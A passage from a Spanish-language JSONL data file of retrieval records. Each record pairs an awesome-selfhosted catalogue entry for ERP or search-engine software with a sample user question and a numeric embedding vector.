[0.05013, 0.05272, -0.10273, -0.26612, 0.15579, -0.0481, 0.04476, -0.05574, -0.19965, -0.13126, -0.06126, -0.0524, 0.00988, -0.08143, -0.00552, -0.02156, 0.11376, -0.15728, 0.04978, 0.06155, -0.0115, 0.04015, 0.00234, -0.10654, -0.15366, -0.05943, 0.09852, -0.17871, -0.02378, 0.13967, 0.21098, -0.05743, 0.07301, -0.11177, 0.04917, 0.01314, 0.02314, 0.01851, 0.09362, 0.02669, 0.05831, 0.02429, 0.00047, 0.03277, 0.07201, -0.0496, 0.07045, -0.01666, 0.02378, 0.06973, 0.01689, -0.12907, -0.09674, 0.02258, -0.03278, 0.04212, -0.06467, -0.19988, -0.03648, 0.04292, -0.06584, -0.00428, 0.05696, 0.0192, 0.00866, -0.03445, 0.11096, 0.02048, 0.02343, -0.03071, -0.0698, -0.0851, -0.08967, -0.02901, 0.03263, -0.01394, 0.03593, -0.02413, -0.04191, 0.00818, 0.04813, 0.0078, -0.00237, 0.03413, -0.03921, 0.0287, 0.01378, 0.11503, 0.01682, -0.03961, -0.04182, 0.02897, -0.02892, 0.04945, -0.0149, 0.03258, 0.10686, 0.01868, -0.04913, 0.1081, -0.07678, 0.02583, -0.07567, -0.00401, -0.04975, 0.1319, -0.02209, -0.14256, -0.01265, 0.06698, -0.05368, -0.0434, -0.01148, -0.03027, -0.07827, -0.01919, 0.0333, -0.03751, -0.00639, 0.01305, -0.00471, -0.04597, 0.07774, 0.02602, 0.02918, 0.03688, 0.02014, 0.17117, 0.02449, 0.04425, 0.02188, -0.018, -0.03072, -0.05564, -0.08786, -0.09108, -0.08516, 0.00458, 0.01333, -0.04574, -0.02869, 0.04396, 0.02225, -0.00062, 0.05091, -0.04997, -0.01396, -0.10987, 0.00043, 0.02457, -0.01749, -0.05773, 0.01516, 0.10404, -0.04999, 0.01083, 0.03904, -0.00106, -0.09282, 0.12551, -0.00385, -0.03687, -0.05326, 0.0145, -0.01514, -0.06199, -0.05411, 0.06751, 0.0288, 0.09357, 0.00062, 0.02662, 0.02184, -0.07759, 0.00237, -0.03259, -0.0007, -0.09784, 0.05237, -0.01792, -0.04807, 0.03462, 0.04249, 0.01937, -0.00861, 0.01078, -0.05564, 0.06589, 0.10923, 0.03755, 0.04176, 0.04739, -0.03356, -0.02879, 0.00892, 0.00171, -0.02405, -0.03996, 0.01816, 0.03189, -0.0876, -0.04777, -0.04749, 0.02822, -0.02249, 0.03978, -0.0136, 0.05919, 0.08549, 0.07937, 0.00422, 0.01699, -0.01395, -0.02643, -0.06338, -0.00722, 0.0109, -0.00771, 0.07253, 0.0494, -0.01442, -0.0436, 0.02594, 0.03094, -0.00526, -0.02592, 0.05693, 0.0127, -0.04271, 0.02543, -0.02144, 0.02281, -0.03719, 0.00718, -0.00203, -0.01282, 0.03677, -0.00743, 0.01253, 0.01615, 0.01665, 0.10656, -0.01137, -0.01935, -0.06376, 0.00118, -0.03039, -0.01512, -0.04194, 0.02474, -0.05791, 0.06906, 0.00447, 0.01727, 0.02105, 0.00575]} -{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "con quΓ© puedo organizar las compras de la nevera y el hogar", "v": [-0.03513, 0.06469, -0.10928, -0.02278, 0.0061, 0.04727, 0.04286, 0.07704, -0.20026, -0.22603, -0.16569, -0.11394, 0.02432, -0.10027, 0.0119, 0.02972, 0.12091, -0.01769, 0.08312, 0.18168, -0.15112, 0.06208, -0.09376, 0.07062, -0.10268, -0.12755, 0.18439, 0.07238, -0.13418, 0.07758, -0.08822, -0.03727, 0.03783, -0.06941, 0.02408, 0.04459, -0.00373, -0.0676, -0.00391, -0.11165, 0.02136, 0.13088, 0.01194, 0.04137, 0.05882, 0.00691, -0.03053, -0.02851, -0.09094, -0.04382, -0.08071, -0.00252, -0.02821, 0.03841, -0.03951, -0.01532, -0.07151, 0.00632, 0.12994, -0.02286, -0.12952, -0.01634, 0.11264, 0.09866, 0.03275, 0.0143, -0.14545, -0.01401, 0.0296, -0.07759, -0.0883, -0.02447, -0.06006, -0.00392, -0.05529, 0.03106, 0.06277, -0.02463, 0.01264, 0.06303, 0.0718, 0.01687, -0.07612, -0.02666, 0.04366, -0.13255, -0.05384, -0.04127, 0.03135, -0.11645, -0.01623, -0.02193, 0.01373, -0.03378, 0.03274, -0.0521, 0.11357, 0.03445, 0.06743, 0.06222, -0.02356, -0.06749, -0.01235, 0.0964, -0.05657, 0.01039, 0.04932, 0.12466, 0.02844, -0.0738, -0.07871, 0.00014, -0.09339, -0.00705, 0.00452, 0.01211, -0.06351, -0.0719, 0.00708, 0.04182, -0.03051, 0.03976, 0.07955, 0.00843, -0.00044, -0.06326, 0.11498, 0.06629, 0.01118, 0.02167, 0.02332, 0.01036, 0.00787, 0.0165, 0.00618, -0.0252, -0.1054, -0.14656, -0.01018, -0.02534, -0.0017, 0.02904, -0.0093, -0.05313, 0.07916, 0.01201, -0.00695, 0.0389, -0.08645, 0.0246, 0.04944, 0.00987, 0.0408, -0.0289, 0.05434, -0.02161, -0.00786, -0.07127, 0.06505, -0.06245, -0.07786, 0.05643, 0.01831, -0.03688, -0.01453, -0.05146, 0.05696, 0.01433, -0.08238, 0.05685, -0.0487, 0.04323, -0.09365, -0.0144, -0.0238, -0.04979, -0.00874, -0.02342, -0.00649, -0.0129, 0.00803, 0.05559, -0.0659, -0.02311, -0.03949, 0.03492, 0.0125, 0.00227, -0.01688, -0.00942, -0.07237, -0.00889, -0.03786, 0.00662, 0.00171, -0.02654, -0.07867, -0.01754, 0.05924, 0.0103, -0.05084, -0.06384, 0.11849, -0.01976, 0.05052, 0.01337, -0.10639, 0.02688, -0.00161, 0.0668, 0.02069, -0.07162, 0.02234, -0.01469, -0.07784, 0.05946, -0.0624, -0.02726, 0.03741, 0.07393, 0.0781, 0.06354, -0.02482, -0.05296, -0.00687, 0.00728, 0.00313, 0.00365, 0.01815, 0.07231, -0.04325, -0.05626, 0.04487, -0.00075, 0.01932, -0.05645, -0.01318, -0.03104, 0.00489, 0.02001, 0.00582, 0.04209, -0.02877, -0.02234, -0.03124, 0.00084, -0.01287, 0.07849, -0.04916, -0.029, -0.00642, -0.00129, 0.03003, -0.05271, -0.04053, -0.01671]} -{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "cual es una alternativa libre a un sistema ERP completo", "v": [-0.08648, -0.02526, -0.08492, -0.11806, 0.01225, 0.01284, 0.11198, -0.10777, -0.21288, -0.14569, -0.17268, -0.05828, 0.05484, -0.05935, 0.15458, -0.06473, -0.0988, -0.01114, 0.05778, 0.01741, -0.1512, -0.01542, -0.10561, -0.05314, -0.03351, 0.05582, -0.11784, 0.08657, -0.07136, 0.0446, 0.1153, 0.13658, 0.01272, -0.08931, -0.06569, 0.11695, 0.19031, 0.0839, 0.02385, -0.14778, 0.08853, -0.01385, -0.02318, 0.08609, 0.05928, -0.02468, 0.02112, 0.0181, 0.11176, -0.03909, -0.11661, 0.0313, -0.12106, -0.06076, 0.1623, -0.11992, 0.06856, -0.06392, 0.07013, 0.01576, -0.06207, 0.13684, -0.02336, -0.03551, -0.02764, 0.0277, -0.05078, -0.0025, -0.09483, 0.09004, -0.02411, -0.02415, -0.00754, -0.02849, -0.04475, -0.00146, -0.00046, -0.00937, -0.0284, 0.03172, 0.09217, -0.06622, -0.09581, 0.10371, -0.02816, -0.08245, 0.0848, -0.01792, -0.01169, 0.01803, 0.05203, 0.021, 0.04554, 0.11968, 0.05187, -0.0849, -0.01312, 0.0717, -0.08831, 0.06167, 0.03052, 0.01813, -0.10648, 0.01354, -0.07894, -0.05797, 0.01641, 0.03589, -0.01678, -0.01593, -0.04232, 0.02589, -0.00244, -0.02906, 0.00169, -0.06193, -0.00025, 0.03613, -0.05381, 0.0054, -0.03342, 0.053, -0.0095, -0.10774, 0.09581, -0.00722, 0.06769, 0.06799, -0.02092, 0.03986, 0.07914, -0.01674, -0.07479, -0.06086, -0.05241, -0.08173, 0.04084, 0.0231, 0.01219, -0.01509, -0.07468, 0.04724, 0.06102, -0.05199, 0.08872, -0.07335, 0.03637, -0.09824, 0.03039, -0.0047, -0.06278, 0.05219, -0.04182, 0.00379, -0.06463, -0.02463, -0.02809, -0.03932, -0.035, 0.02192, 0.03083, 0.00858, -0.00314, 0.02862, 0.01937, -0.05989, 0.02325, -0.05908, 0.00342, -0.00902, 0.01091, 0.08658, 0.08615, -0.03282, 0.01391, -0.07819, -0.03381, -0.10437, 0.03553, -0.00837, -0.04802, 0.02406, -0.04864, -0.02526, -0.00145, -0.02326, -0.01423, 0.01255, 0.0099, 0.03269, 0.02646, 0.05385, -0.04754, -0.08764, -0.02705, 0.02622, -0.02878, -0.0917, 0.00346, 0.00257, -0.06476, -0.00149, 0.0029, -0.06026, -0.02678, 0.05356, 0.0463, 0.07307, 0.01529, 0.07861, 0.03886, 0.03126, 0.08846, 0.00211, -0.06051, -0.02879, -0.03032, -0.01038, 0.02468, -0.03284, 0.01663, 0.00547, 0.03044, 0.00616, -0.01323, 0.00569, 0.01833, 0.09197, -0.06035, -0.01009, 0.01321, -0.04871, 0.00938, 0.0328, 0.0085, -0.03881, -0.01106, 0.006, -0.02275, -0.06918, 0.07707, 0.09882, -0.00459, -0.03649, -0.01898, -0.01192, -0.06817, -0.0367, -0.03621, -0.07456, -0.04374, 0.02587, 0.00068, -0.03324, -0.00147, -0.00309]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "con quΓ© puedo montar un buscador para documentos PDF y archivos de oficina?", "v": [0.094, -0.01996, -0.0882, -0.15079, -0.0361, -0.07257, 0.1164, -0.04806, -0.15026, -0.11786, -0.0989, -0.06115, 0.0704, -0.15692, 0.00407, -0.01963, 0.22305, -0.07937, -0.03414, -0.05124, 0.0033, -0.0161, 0.01514, -0.01623, -0.00243, -0.05498, -0.00226, -0.06244, -0.09034, 0.0164, 0.03777, 0.10499, 0.04739, 0.04362, -0.10052, 0.10071, -0.01503, 0.03488, -0.06062, -0.00511, 0.04343, 0.09426, -0.13862, 0.18152, -0.11533, -0.01292, -0.01204, 0.07493, -0.07771, 0.0021, -0.02087, -0.14096, -0.08235, 0.12846, -0.12446, -0.06808, 0.1038, -0.11068, 0.09662, -0.08141, -0.03483, 0.11676, -0.08981, 0.05374, -0.0486, 0.013, 0.04354, 0.01405, -0.02377, -0.01905, -0.07936, 0.00254, 0.0331, -0.04624, -0.08149, 0.06769, -0.00628, -0.02159, -0.04344, 0.11537, 0.11254, 0.02596, -0.08419, 0.04471, -0.10899, -0.15398, 0.03806, -0.01476, 0.0493, -0.04154, -0.01635, 0.03333, -0.0047, 0.00051, -0.06243, -0.06117, 0.04693, -0.01832, -0.02948, -0.01382, -0.05732, 0.05769, 0.00012, 0.04078, 0.01953, -0.01788, -0.04817, 0.01817, -0.02167, 0.01719, 0.04433, 0.05325, -0.04214, 0.11984, -0.09834, -0.10653, 0.03194, -0.03714, -0.03945, -0.13405, -0.03542, 0.09482, -0.03039, 0.01896, 0.00177, -0.1054, 0.1209, 0.10139, -0.06361, -0.00355, 0.11474, 0.00991, -0.14963, 0.0088, 0.02016, 0.00135, -0.02479, -0.05443, -0.05594, -0.0163, 0.04831, -0.09867, -0.00033, -0.02362, 0.04678, 0.0357, 0.06015, 0.03014, 0.00441, -0.11308, -0.01549, -0.02457, 0.07208, -0.00594, -0.03971, 0.02647, 0.04345, -0.02359, -0.00906, 0.02474, 0.01167, 0.05951, -0.0698, 0.02389, -0.03411, -0.03199, -0.01652, 0.00098, 0.04302, -0.02039, 0.02364, -0.0904, -0.00528, -0.1499, 0.06429, 0.00303, -0.02903, 0.00118, 0.0658, 0.01732, -0.04655, 0.05507, 0.02874, 0.0736, -0.06432, -0.02178, 0.1232, -0.06212, 0.0036, 0.02435, 0.01968, 0.02417, -0.04041, 0.00073, -0.00868, -0.06076, -0.03531, 0.00555, 0.02975, -0.05493, -0.02807, -0.02331, -0.04298, 0.03422, 0.058, -0.00452, -0.02202, 0.0454, -0.00673, 0.0251, -0.01034, -0.02591, 0.04695, -0.02312, -0.08257, -0.06339, -0.00128, -0.00115, 0.03484, 0.04081, 0.06875, 0.02781, 0.08686, -0.02915, 0.05172, -0.02124, 0.05742, -0.00471, -0.00962, 0.01572, 0.0049, 0.03229, -0.02161, -0.00384, 0.01099, 0.05024, 0.04796, 0.00545, -0.02591, -0.03967, -0.01042, 0.08289, -0.00681, 0.00113, -0.06822, -0.00223, -0.02668, 0.01547, 0.03854, -0.01837, -0.0182, 0.03164, 0.03764, -0.02294, 0.01342, -0.10627]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "que programa sirve para indexar grandes cantidades de datos y hacer bΓΊsquedas rΓ‘pidas?", "v": [0.15397, 0.16829, -0.07534, -0.16046, 0.09138, -0.16939, 0.0632, -0.13876, -0.07105, -0.01272, 0.02977, -0.12853, -0.03177, -0.14431, 0.01913, 0.02755, 0.07443, -0.10301, 0.04784, -0.02446, 0.04672, -0.06472, -0.09262, -0.09273, -0.20555, -0.11843, -0.04529, -0.01112, -0.1733, 0.06788, -0.06713, 0.01538, -0.04201, -0.05927, -0.18742, 0.00968, 0.06509, 0.02373, -0.08321, -0.11004, -0.01655, 0.04499, -0.09739, -0.04757, 0.06683, 0.03464, -0.03387, 0.02626, -0.00083, -0.12586, 0.044, -0.00415, -0.02812, 0.01012, -0.05878, -0.04356, 0.00121, -0.1283, -0.04157, -0.07418, -0.02786, -0.07268, 0.04645, -0.02647, 0.03462, 0.07251, 0.12141, 0.02283, -0.01848, 0.00996, -0.13492, 0.08536, 0.0339, -0.03962, 0.05528, -0.0053, 0.0194, 0.01042, -0.03394, -0.02308, -0.04121, -0.04077, -0.02188, 0.01704, -0.03099, 0.00766, 0.02593, -0.01154, 0.01414, -0.03886, 0.09204, 0.06576, 0.01271, 0.13813, 0.08279, 0.0227, 0.07908, -0.01411, 0.02019, 0.11329, -0.01158, -0.03159, -0.14273, 0.06353, -0.02552, 0.10564, 0.02681, 0.02299, -0.11909, 0.01732, 0.01369, -0.03235, -0.02731, -0.12461, -0.00296, 0.01862, -0.04713, -0.02422, -0.01419, 0.02914, -0.04704, -0.00414, -0.02177, 0.02966, 0.01095, -0.06907, -0.00963, 0.00825, 0.04885, 0.06028, 0.06001, 0.00619, -0.08282, -0.02414, 0.03413, -0.02453, -0.03837, -0.02601, 0.12136, -0.10623, 0.04892, 0.0515, -0.01488, -0.03266, -0.0092, -0.04707, 0.12911, 0.03853, -0.03744, -0.025, 0.04538, 0.02437, 0.03268, 0.08797, -0.0125, -0.06273, -0.01629, -0.11475, -0.06023, -0.00514, -0.02334, 0.05063, -0.02969, -0.01155, 0.07622, -0.03903, 0.03137, 0.00539, 0.10533, 0.05563, -0.08774, 0.06578, 0.01396, -0.15607, 0.0678, 0.05677, 0.0061, -0.08526, -0.01798, -0.04812, -0.01183, -0.06464, 0.0147, -0.00216, 0.0266, -0.01359, 0.03563, -0.0126, -0.02145, -0.0349, 0.02868, 0.03624, -0.02146, 0.01315, -0.00959, -0.03789, -0.04737, 0.03112, 0.01038, -0.09898, -0.02699, 0.02117, -0.08084, -0.00803, -0.06017, 0.07517, 0.01639, -0.04933, 0.07139, 0.02092, -0.02786, -0.00203, 0.01967, -0.01138, -0.11867, -0.06547, 0.01389, 0.02301, 0.02402, 0.05616, -0.04946, 0.01846, 0.0019, 0.07151, -0.00704, -0.03911, 0.09934, -0.03944, -0.01684, -0.03786, 0.02458, -0.02168, 0.00369, -0.04999, 0.01126, -0.04974, -0.03744, -0.01477, -0.00164, -0.04727, -0.00228, -0.00489, -0.02723, 0.02526, -0.00586, 0.02404, -0.06538, -0.03778, 0.02928, -0.0504, -0.04517, -0.01928, 0.05618, -0.02705, 0.08083, -0.02117]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Aleph β€” Tool for indexing large amounts of both documents (PDF, Word, HTML) and structured (CSV, XLS, SQL) data for easy browsing and search. It is built with investigative reporting as a primary use case [MIT, Docker/K8S]. Amgix β€” Open-source hybrid search engine built for flexible deployment and real-world messy data [AGPL-3.0, Docker/K8S]. Apache Solr β€” Enterprise search platform featuring full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, and rich document (e.g., Word, PDF) handling [Apache-2.0, Java/Docker/K8S]. Fess β€” Powerful and easily deployable Enterprise Search Server [Apache-2.0, Java/Docker]. Hister β€” Personal web search engine with automatic indexing of visited websites. Supports offline local result previews, local files, multi-user handling and optional semantic search [AGPL-3.0, Go/Docker]. Manticore Search β€” Full-text search and data analytics, with fast response time for small, medium and big data (alternative to Elasticsearch) [GPL-3.0, Docker/deb/C++/K8S].", "indexar": "cual es una alternativa libre a Elasticsearch para el anΓ‘lisis de datos?", "v": [-0.22506, 0.03566, -0.04955, -0.07838, -0.00507, -0.05926, -0.05167, -0.10495, -0.17051, 0.0825, -0.07156, -0.22889, -0.1338, 0.04791, 0.11991, -0.09964, 0.07033, -0.09569, 0.08401, -0.06265, -0.1379, -0.074, -0.18693, -0.07233, -0.07149, -0.01351, -0.12144, 0.06324, -0.02797, 0.09763, -0.01557, -0.01241, -0.04155, -0.05825, 0.00018, 0.16683, 0.14902, 0.03492, 0.10735, -0.03968, 0.05149, -0.0976, -0.00039, -0.00839, 0.00844, -0.07682, -0.10781, 0.08122, -0.02204, 0.0129, -0.05488, 0.02772, -0.0473, 0.07725, 0.10424, -0.08422, 0.11586, -0.15902, 0.04013, 0.00288, -0.09186, 0.02492, 0.02433, 0.01807, 0.02227, -0.038, 0.01786, 0.04212, -0.0411, 0.06293, 0.09087, 0.03846, -0.03936, -0.0554, -0.01617, 0.03344, 0.0911, 0.06387, 0.04776, 0.08184, -0.00725, -0.02563, 0.01696, 0.08869, -0.05042, 0.02203, 0.06395, -0.08163, -0.01718, 0.05262, 0.08311, -0.01437, -0.0647, 0.13498, 0.01175, -0.039, 0.02386, -0.04722, -0.02456, -0.01068, 0.06468, 0.01069, -0.07915, 0.01008, 0.00823, 0.01132, -0.03669, 0.04517, -0.16188, 0.05687, -0.02686, -0.02252, -0.02747, -0.01504, 0.00905, -0.07376, -0.04251, -0.02606, 0.04494, -0.04958, 0.03048, -0.02011, -0.01485, -0.07728, -0.08759, -0.04976, 0.05694, 0.06061, 0.04407, 0.02421, 0.1029, 0.03032, -0.13294, -0.0779, -0.04622, 0.00658, 0.034, -0.03754, 0.00831, -0.01401, 0.00067, 0.03195, -0.03055, 0.06218, 0.04898, -0.08635, 0.01103, 0.02885, -0.01031, -0.03762, -0.07494, -0.00696, 0.00999, 0.07359, -0.05119, -0.01589, -0.07967, -0.03208, -0.08826, -0.00508, 0.02293, 0.00072, -0.03834, 0.02072, 0.05317, -0.01602, 0.04295, -0.06417, -0.06315, 0.02552, -0.04433, -0.00143, 0.06936, -0.11609, 0.07981, -0.01537, -0.00438, -0.15262, -0.0128, -0.05612, 0.05287, -0.02153, -0.04888, -0.02026, -0.03115, -0.03925, 0.03627, -0.02372, 0.01098, -0.03382, -0.01829, 0.04476, -0.00123, -0.06691, 0.01618, -0.04495, 0.04168, -0.05279, 0.01296, -0.02351, -0.05107, 0.04065, -0.0696, -0.02919, -0.04748, 0.00995, 0.00797, -0.03118, 0.02624, -0.02682, -0.00628, -0.04318, 0.08144, 0.00862, -0.06599, -0.02469, 0.04674, -0.00967, -0.0281, -0.00023, -0.00183, 0.06348, 0.04444, 0.02856, -0.06654, 0.05302, 0.04557, -0.01805, -0.02313, -0.03866, 0.00787, -0.00688, -0.01027, 0.05747, -0.0108, -0.01647, -0.0211, 0.001, 0.01554, -0.02458, 0.05904, 0.02992, -0.10807, -0.0045, 0.00671, 0.01501, -0.10257, 0.03509, -0.04097, -0.07507, -0.03841, 0.0126, -0.01688, -0.03274, 0.05074, -0.03135]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "que programa hay para hacer bΓΊsqueda de texto muy rΓ‘pida y que tolere errores de escritura?", "v": [-0.12915, 0.09582, -0.07206, -0.21085, 0.04711, -0.0687, -0.03735, 0.01566, 0.04656, -0.09038, -0.04181, -0.05637, 0.01939, -0.12897, 0.05877, -0.00396, 0.05787, 0.02851, 0.13273, -0.023, 0.01746, -0.08714, -0.04696, -0.05754, -0.11894, -0.08583, -0.08599, -0.02845, -0.04903, 0.0021, -0.06556, 0.0731, 0.09168, -0.07224, -0.12491, 0.09261, 0.09221, -0.04527, -0.02805, 0.10017, 0.1058, 0.15174, -0.05773, 0.06347, 0.00187, -0.06818, 0.11056, 0.0332, -0.07053, -0.02541, 0.07016, -0.06612, 0.03617, -0.01955, -0.03848, 0.01246, 0.15433, -0.15044, -0.05417, -0.14403, 0.04668, 0.02903, -0.03778, -0.0804, -0.05333, 0.10908, 0.08196, -0.04406, -0.05639, 0.13409, 0.06287, -0.00205, -0.01346, 0.06266, -0.02497, 0.01401, -0.08571, -0.08254, 0.07507, -0.00364, -0.04042, -0.0173, -0.04992, 0.05605, -0.00304, -0.02587, -0.01086, -0.05873, 0.00632, 0.01123, 0.0306, -0.06362, 0.0282, -0.01658, -0.02129, -0.11208, 0.15551, -0.07181, 0.04165, 0.17261, 0.07047, -0.1891, -0.03431, 0.07953, -0.10371, 0.0591, -0.00272, 0.0794, -0.01344, 0.00958, -0.00974, -0.00617, -0.0496, -0.00936, -0.06529, 0.00974, 0.07919, -0.02606, -0.00031, -0.05556, -0.07588, -0.08303, -0.08184, -0.04774, 0.07445, 0.00306, 0.00608, 0.05973, -0.04306, 0.10509, 0.05074, -0.00513, -0.06386, -0.08373, 0.00136, 0.03938, 0.03094, 0.04976, 0.02619, -0.02476, -0.00854, -0.02997, -0.0525, -0.00883, -0.06947, -0.02709, 0.01313, -0.07444, -0.00253, 0.01256, -0.12537, 0.01627, 0.01063, 0.02005, -0.03665, -0.05369, 0.01382, -0.00671, -0.06892, -0.04521, -0.0746, 0.01502, -0.06651, 0.00118, 0.084, -0.04089, -0.00838, 0.01167, 0.04301, 0.01447, -0.09465, 0.02917, 0.04912, -0.10999, 0.03232, 0.07558, 0.01213, 0.00244, -0.05071, -0.03072, -0.09029, -0.04195, -0.03359, 0.07857, 0.05839, 0.01941, 0.09279, 0.01493, 0.00312, -0.05704, 0.00846, -0.01514, -0.02246, -0.05099, -0.05697, 0.02416, -0.04236, 0.02678, 0.07212, -0.11073, -0.05372, -0.0316, 0.00823, 0.02134, 0.01477, 0.03722, -0.04099, -0.04117, 0.05179, 0.10424, 0.02844, 0.03778, 0.03406, 0.00626, -0.0643, -0.03855, -0.0027, 0.05065, 0.04422, 0.03708, 0.05144, -0.05026, -0.0192, 0.05009, 0.00196, -0.06945, 0.04692, -0.03616, -0.00656, 0.07217, 0.03448, -0.04799, -0.06303, -0.05692, 0.02008, 0.00764, -0.00744, -0.02163, -0.02325, -0.03723, 0.03564, 0.00052, -0.00345, -0.02216, -0.00544, 0.05956, -0.05724, 0.04194, -0.02605, 0.05093, -0.04868, -0.06131, 0.00902, -0.05506, 0.08999, -0.07939]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "con quΓ© puedo montar un motor de bΓΊsqueda que no use anuncios ni rastree datos personales?", "v": [-0.03369, 0.08641, -0.06219, -0.20232, -0.12339, 0.04896, -0.05815, -0.02204, -0.19609, -0.14338, 